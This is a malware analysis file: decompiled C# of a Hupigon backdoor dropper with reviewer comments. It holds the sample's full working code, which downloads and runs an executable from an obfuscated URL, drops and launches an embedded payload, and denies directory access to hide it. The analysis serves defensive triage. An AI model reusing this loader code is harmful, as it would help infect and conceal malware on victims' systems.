// Decompiled with JetBrains decompiler
// Type: X
// Assembly: 12, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 02FFA771-B60F-49F4-BE51-37E50E40AF6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.Hupigon.mrzd-97a335ad9a7d65429e8d9aedeaa1dd6b93990dd399d43ca43d8ef174c0f0faee.exe
//
// Analyst notes (added during review; the code below is unchanged decompiler output):
//  - The sample's file name labels it Backdoor.Win32.Hupigon.mrzd. This class is a dropper/loader stub:
//    it optionally downloads and runs a second executable, then unpacks an embedded resource to disk and runs it.
//  - File-system artifacts visible in this listing: "%temp%\jp.exe" and
//    "%programdata%\DCSCRES_SERVERW\DCSCRES_SERVERW.exe", plus Deny ACEs added to the DCSCRES_SERVERW directory.
//  - The "MyApplication.\u002E\u002E\u002E\u002E & N" tests read a field that is not part of this listing.
//    NOTE(review): they look like obfuscator-inserted opaque predicates standing in for plain loop jumps;
//    the field's value cannot be confirmed from here, so control-flow comments below are hedged accordingly.

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using My;
using System;
using System.Collections;
using System.IO;
using System.IO.Compression;
using System.Net;
using System.Reflection;
using System.Resources;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Text;

internal class X
{
  /// <summary>
  /// Entry point. Stage 1 (conditional): download a file to %temp%\jp.exe and launch it.
  /// Stage 2 (always): unpack resource "A" from resource set "M", write it under %programdata% and launch it.
  /// Every failure is swallowed, so the process gives no visible error.
  /// </summary>
  [STAThread]
  public static void main()
  {
    // Stage 1 runs only when the base directory path is shorter than 4 characters
    // or contains "temp" (case-insensitive, via ToLower + InStr).
    // NOTE(review): a length below 4 would match a bare drive root such as "C:\" - confirm intent.
    if (AppDomain.CurrentDomain.BaseDirectory.Length < 4 | Strings.InStr(AppDomain.CurrentDomain.BaseDirectory.ToLower(), "temp") > 0)
    {
      try
      {
        WebClient webClient1 = new WebClient();
        string path = Interaction.Environ("temp") + "\\jp.exe";
        WebClient webClient2 = webClient1;
        // Obfuscated download address: DEB() inverts the letter case and then Base64-decodes it.
        // The literal is therefore not valid as plain Base64 text until the case swap is applied.
        string s = "Ahr0CdOVl2XVywrPBMCTys5SzwfKAg9ZDgvYlMnVBs90ywWUmJaXmdKYoteXmJe1nc5LEgu=";
        string address = X.DEB(ref s);
        // Payload is fetched fully into memory, written to disk, then executed from %temp%.
        byte[] bytes = webClient2.DownloadData(address);
        System.IO.File.WriteAllBytes(path, bytes);
        Interaction.Shell(Interaction.Environ("temp") + "\\jp.exe");
      }
      catch (Exception ex)
      {
        // VB-style "On Error Resume Next" residue: the error is recorded and immediately cleared.
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }
    // Stage 2: the embedded object "A" (resource set "M") is cast to byte[] and passed through Z() twice,
    // i.e. the payload is stored as two nested gzip layers.
    byte[] bytes1 = X.Z(X.Z((byte[]) new ResourceManager("M", Assembly.GetExecutingAssembly()).GetObject("A")));
    string Path = Interaction.Environ("programdata") + "\\DCSCRES_SERVERW";
    string str = Path + "\\DCSCRES_SERVERW.exe";
    try
    {
      FileSystem.MkDir(Path);
    }
    catch (Exception ex)
    {
      // Swallowed; MkDir failing (for example because the directory already exists) does not stop the drop.
      ProjectData.SetProjectError(ex);
      ProjectData.ClearProjectError();
    }
    try
    {
      // The directory ACL is modified BEFORE the payload is written and started.
      X.BD(ref Path);
      System.IO.File.WriteAllBytes(str, bytes1);
      Interaction.Shell(str);
    }
    catch (Exception ex)
    {
      ProjectData.SetProjectError(ex);
      ProjectData.ClearProjectError();
    }
  }

  /// <summary>
  /// Decompresses one gzip layer. The output size is taken from 4 bytes inside the input itself.
  /// </summary>
  /// <param name="Byt">Compressed buffer.</param>
  /// <returns>A buffer of the size read from the input, filled by a single Read call on the gzip stream.</returns>
  public static byte[] Z(byte[] Byt)
  {
    MemoryStream memoryStream = new MemoryStream(Byt);
    GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Decompress);
    byte[] buffer = new byte[4];
    // Reads the length field starting 5 bytes before the end of the input.
    // NOTE(review): a plain gzip member keeps its ISIZE field in the final 4 bytes, so this offset
    // suggests the stored blob carries one extra trailing byte - confirm against the sample.
    memoryStream.Position = checked (memoryStream.Length - 5L);
    memoryStream.Read(buffer, 0, 4);
    int int32 = BitConverter.ToInt32(buffer, 0);
    // Rewind so the gzip stream starts decoding from the first byte.
    memoryStream.Position = 0L;
    // "int32 - 1 + 1" is a VB upper-bound artifact; the array has int32 elements.
    byte[] array = new byte[checked (int32 - 1 + 1)];
    // Single Read; its return value is ignored, so a short read would leave the tail zero-filled.
    // Anyone re-implementing this unpacker for analysis should loop until the buffer is full.
    gzipStream.Read(array, 0, int32);
    gzipStream.Dispose();
    memoryStream.Dispose();
    return array;
  }

  /// <summary>
  /// String de-obfuscator: passes <paramref name="s"/> through Lu(), Base64-decodes the result
  /// and returns the bytes interpreted as UTF-8 text.
  /// </summary>
  public static string DEB(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(X.Lu(ref s)));

  /// <summary>
  /// Builds a new string from <paramref name="text"/>, comparing each character against the 26 lowercase
  /// letters in str1 and against their uppercase forms. A lowercase match appends the uppercase form,
  /// an uppercase match appends the lowercase form, and a character matching neither is appended unchanged.
  /// NOTE(review): the net effect is a letter-case inversion only if the MyApplication field tests always
  /// take their goto branch; that field is outside this listing - confirm.
  /// </summary>
  public static string Lu(ref string text)
  {
    // Lookup alphabet (keyboard order); only membership matters, not the order.
    string str1 = "qwertyuiopasdfghjklzxcvbnm";
    string str2 = "";
    int num1 = checked (text.Length - 1);
    int index1 = 0;
    // Jump to the outer loop's bounds check (label_10) when the field test is true.
    if ((MyApplication.\u002E\u002E\u002E\u002E & 1030) == 0)
      goto label_10;
label_1:
    // Outer loop body: one iteration per character of text.
    int num2 = checked (str1.Length - 1);
    int index2 = 0;
    // Jump to the inner loop's bounds check (label_7) when the field test is true.
    if ((MyApplication.\u002E\u002E\u002E\u002E & 22) == 0)
      goto label_7;
label_2:
    // Inner loop body: compare the current character with alphabet letter index2.
    char ch1 = text[index1];
    char ch2;
    if ((int) ch1 == (int) str1[index2])
    {
      // Lowercase letter found: append its uppercase form, then leave the inner loop.
      string str3 = str2;
      ch2 = text[index1];
      string upper = ch2.ToString().ToUpper();
      str2 = str3 + upper;
      if ((MyApplication.\u002E\u002E\u002E\u002E & 5700) == 0)
        goto label_9;
    }
    int num3 = (int) ch1;
    ch2 = str1[index2];
    int num4 = (int) Conversions.ToChar(ch2.ToString().ToUpper());
    if (num3 == num4)
    {
      // Uppercase letter found: append its lowercase form, then leave the inner loop.
      str2 += text[index1].ToString().ToLower();
      if ((MyApplication.\u002E\u002E\u002E\u002E & 1538) == 0)
        goto label_9;
    }
    checked { ++index2; }
label_7:
    // Alphabet exhausted without leaving the loop: append the character as-is (digits, '=', '+', '/').
    if (index2 > num2)
      str2 += Conversions.ToString(text[index1]);
    else
      goto label_2;
label_9:
    checked { ++index1; }
label_10:
    if (index1 > num1)
      return str2;
    goto label_1;
  }

  /// <summary>
  /// Adds a Deny / ReadData access rule on the directory <paramref name="Path"/> for each account
  /// that appears in the directory's current access rules.
  /// FileSystemRights.ReadData has the same value as ListDirectory, so on a directory this denies listing.
  /// NOTE(review): presumably meant to hinder browsing of the drop folder - intent is not shown in the code.
  /// For triage, Deny ACEs appearing on the drop directory named in main() are an observable side effect.
  /// </summary>
  public static void BD(ref string Path)
  {
    DirectorySecurity accessControl1 = Directory.GetAccessControl(Path, AccessControlSections.All);
    IEnumerator enumerator;
    try
    {
      // Enumerates explicit and inherited rules, with identities translated to NTAccount names.
      enumerator = accessControl1.GetAccessRules(true, true, typeof (NTAccount)).GetEnumerator();
      // Jump to MoveNext (label_5) when the field test is true; otherwise Current is read before MoveNext.
      if ((MyApplication.\u002E\u002E\u002E\u002E & 4624) == 0)
        goto label_5;
label_2:
      FileSystemAccessRule current = (FileSystemAccessRule) enumerator.Current;
      try
      {
        // The ACL is re-read and re-written once per rule rather than batched.
        DirectorySecurity accessControl2 = Directory.GetAccessControl(Path, AccessControlSections.All);
        // Uses the part after the first backslash of the identity value as the account name.
        // An identity without a backslash makes the [1] index throw; the catch below then skips it.
        FileSystemAccessRule rule = new FileSystemAccessRule((IdentityReference) new NTAccount(Strings.Split(current.IdentityReference.Value, "\\")[1]), FileSystemRights.ReadData, AccessControlType.Deny);
        accessControl2.AddAccessRule(rule);
        Directory.SetAccessControl(Path, accessControl2);
      }
      catch (Exception ex)
      {
        // Per-identity failures are swallowed so the remaining rules are still processed.
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
label_5:
      if (enumerator.MoveNext())
        goto label_2;
    }
    finally
    {
      if (enumerator is IDisposable)
        (enumerator as IDisposable).Dispose();
    }
  }
}